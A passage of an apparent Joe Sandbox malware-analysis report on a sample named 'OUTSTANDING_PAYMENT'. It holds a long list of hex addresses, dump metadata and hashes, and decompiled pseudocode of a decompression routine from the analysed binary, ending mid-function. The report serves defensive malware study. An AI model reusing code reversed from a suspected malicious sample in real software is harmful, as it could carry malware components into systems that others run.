                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040741c
                                                                                                                        0x00407420
                                                                                                                        0x004075cf
                                                                                                                        0x00000000
                                                                                                                        0x004075cf
                                                                                                                        0x0040742c
                                                                                                                        0x00407433
                                                                                                                        0x0040743b
                                                                                                                        0x0040743e
                                                                                                                        0x00407441
                                                                                                                        0x00407441
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d61
                                                                                                                        0x00406d64
                                                                                                                        0x00406dd5
                                                                                                                        0x00406dd8
                                                                                                                        0x00406ddb
                                                                                                                        0x00406de2
                                                                                                                        0x00406dec
                                                                                                                        0x00000000
                                                                                                                        0x00406dec
                                                                                                                        0x00406d66
                                                                                                                        0x00406d6a
                                                                                                                        0x00406d6d
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d72
                                                                                                                        0x00406d75
                                                                                                                        0x00406d77
                                                                                                                        0x00406d7a
                                                                                                                        0x00406d7c
                                                                                                                        0x00406d81
                                                                                                                        0x00406d84
                                                                                                                        0x00406d87
                                                                                                                        0x00406d8b
                                                                                                                        0x00406d92
                                                                                                                        0x00406d95
                                                                                                                        0x00406d9c
                                                                                                                        0x00406da0
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406dac
                                                                                                                        0x00406daf
                                                                                                                        0x00406dcd
                                                                                                                        0x00406dcf
                                                                                                                        0x00000000
                                                                                                                        0x00406db1
                                                                                                                        0x00406db1
                                                                                                                        0x00406db4
                                                                                                                        0x00406db7
                                                                                                                        0x00406dba
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbf
                                                                                                                        0x00406dc2
                                                                                                                        0x00406dc4
                                                                                                                        0x00406dc5
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00406ffe
                                                                                                                        0x00407002
                                                                                                                        0x00407020
                                                                                                                        0x00407023
                                                                                                                        0x0040702a
                                                                                                                        0x0040702d
                                                                                                                        0x00407030
                                                                                                                        0x00407033
                                                                                                                        0x00407036
                                                                                                                        0x00407039
                                                                                                                        0x0040703b
                                                                                                                        0x00407042
                                                                                                                        0x00407043
                                                                                                                        0x00407045
                                                                                                                        0x00407048
                                                                                                                        0x0040704b
                                                                                                                        0x0040704e
                                                                                                                        0x0040704e
                                                                                                                        0x00407053
                                                                                                                        0x00000000
                                                                                                                        0x00407053
                                                                                                                        0x00407004
                                                                                                                        0x00407007
                                                                                                                        0x0040700a
                                                                                                                        0x00407014
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407068
                                                                                                                        0x0040706c
                                                                                                                        0x0040708f
                                                                                                                        0x00407092
                                                                                                                        0x00407095
                                                                                                                        0x0040709f
                                                                                                                        0x0040706e
                                                                                                                        0x0040706e
                                                                                                                        0x00407071
                                                                                                                        0x00407074
                                                                                                                        0x00407077
                                                                                                                        0x00407084
                                                                                                                        0x00407087
                                                                                                                        0x00407087
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070ab
                                                                                                                        0x004070af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070b5
                                                                                                                        0x004070b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070bf
                                                                                                                        0x004070c1
                                                                                                                        0x004070c5
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x00000000
                                                                                                                        0x00407137
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00407166
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407170
                                                                                                                        0x00407175
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406df8
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x00000000
                                                                                                                        0x00407569
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e20
                                                                                                                        0x00406e23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e29
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e60
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e93
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e9c
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00000000
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406ef9
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f24
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f29
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00000000
                                                                                                                        0x00406f35
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f75
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00406f9a
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00000000
                                                                                                                        0x00406f41
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fbd
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fe8
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fed
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00000000
                                                                                                                        0x00407482
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407194
                                                                                                                        0x00407197
                                                                                                                        0x0040719a
                                                                                                                        0x0040719c
                                                                                                                        0x0040719e
                                                                                                                        0x0040719e
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a9
                                                                                                                        0x004071ac
                                                                                                                        0x004071ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040749f
                                                                                                                        0x0040749f
                                                                                                                        0x004074a3
                                                                                                                        0x004075db
                                                                                                                        0x00000000
                                                                                                                        0x004075db
                                                                                                                        0x004074a9
                                                                                                                        0x004074ac
                                                                                                                        0x004074af
                                                                                                                        0x004074b3
                                                                                                                        0x004074b6
                                                                                                                        0x004074bc
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074c1
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f44
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070cf
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x00000000
                                                                                                                        0x00407599
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070df
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00000000
                                                                                                                        0x0040710d
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x004075e5
                                                                                                                        0x004075eb
                                                                                                                        0x004075ed
                                                                                                                        0x004075f4
                                                                                                                        0x004075f6
                                                                                                                        0x004075fd
                                                                                                                        0x00407601
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x00000000
                                                                                                                        0x004075fa
                                                                                                                        0x00407447
                                                                                                                        0x004074cd
                                                                                                                        0x004074d3
                                                                                                                        0x004074d6
                                                                                                                        0x004074d9
                                                                                                                        0x004074dc
                                                                                                                        0x004074df
                                                                                                                        0x004074e2
                                                                                                                        0x004074e5
                                                                                                                        0x004074e8
                                                                                                                        0x004074ee
                                                                                                                        0x00407507
                                                                                                                        0x0040750a
                                                                                                                        0x0040750d
                                                                                                                        0x00407510
                                                                                                                        0x00407514
                                                                                                                        0x00407516
                                                                                                                        0x00407517
                                                                                                                        0x0040751a
                                                                                                                        0x004074f0
                                                                                                                        0x004074f0
                                                                                                                        0x004074f8
                                                                                                                        0x004074fd
                                                                                                                        0x004074ff
                                                                                                                        0x00407502
                                                                                                                        0x00407502
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407399

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                        • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                                                        • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                        • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
